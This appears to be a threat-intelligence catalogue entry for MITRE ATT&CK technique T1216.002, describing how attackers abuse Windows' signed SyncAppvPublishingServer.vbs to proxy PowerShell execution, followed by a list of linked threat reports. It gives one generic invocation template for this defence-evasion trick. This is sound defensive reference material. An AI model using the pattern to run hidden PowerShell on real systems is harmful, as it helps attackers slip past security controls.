Common Information
| Type | Value |
|---|---|
| Value |
SyncAppvPublishingServer - T1216.002 |
| Category | Attack-Pattern |
| Type | Mitre-Attack-Pattern |
| Misp Type | Cluster |
| Description | Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv) The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv) Adversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive counter measures by "living off the land."(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv) `SyncAppvPublishingServer.vbs "n; {PowerShell}"` |
| Details | Published | Attributes | CTI | Title | ||
|---|---|---|---|---|---|---|
| Details | Website | 2024-11-01 | 4 | Finding the LNK: Techniques and methodology for advanced analysis with Velociraptor | Rapid7 Blog | ||
| Details | Website | 2024-09-02 | 51 | Stone Wolf employs Meduza Stealer to hack Russian companies | ||
| Details | Website | 2023-10-03 | 94 | Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement | Microsoft Security Blog | ||
| Details | Website | 2023-09-19 | 100 | Unveiling the Shadows: The Dark Alliance between GuLoader and Remcos - Check Point Research | ||
| Details | Website | 2023-08-07 | 2 | Run Powershell command without Powershell.exe | ||
| Details | Website | 2023-06-19 | 24 | APT-41 Backdoor Analysis | ||
| Details | Website | 2022-12-27 | 130 | BlueNoroff introduces new methods bypassing MoTW | ||
| Details | Website | 2022-11-23 | 3 | Chrome Extension Deploy Windows Malware to Steal Crypto | ||
| Details | Website | 2022-11-21 | 72 | ViperSoftX: Hiding in System Logs and Spreading VenomSoftX - Avast Threat Labs | ||
| Details | Website | 2022-11-02 | 118 | Server-side attacks, C&C in public clouds and other MDR cases we observed | ||
| Details | Website | 2022-09-29 | 3 | Fancy Bear Hackers Distributing Graphite Malware using PowerPoint Files | ||
| Details | Website | 2022-09-27 | 3 | Fancy Bear hackers exploit PowerPoint files to spread Graphite malware | IT PRO | ||
| Details | Website | 2022-09-26 | 6 | Hackers use PowerPoint files for 'mouseover' malware delivery | ||
| Details | Website | 2022-09-23 | 44 | In the footsteps of the Fancy Bear: PowerPoint mouse-over event abused to deliver Graphite implants | ||
| Details | Website | 2022-03-17 | 36 | Suspected DarkHotel APT Activity Update | ||
| Details | Website | 2022-01-31 | 83 | Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables | ||
| Details | Website | 2018-12-27 | 37 | The Enigmatic “Roma225” Campaign - Yoroi |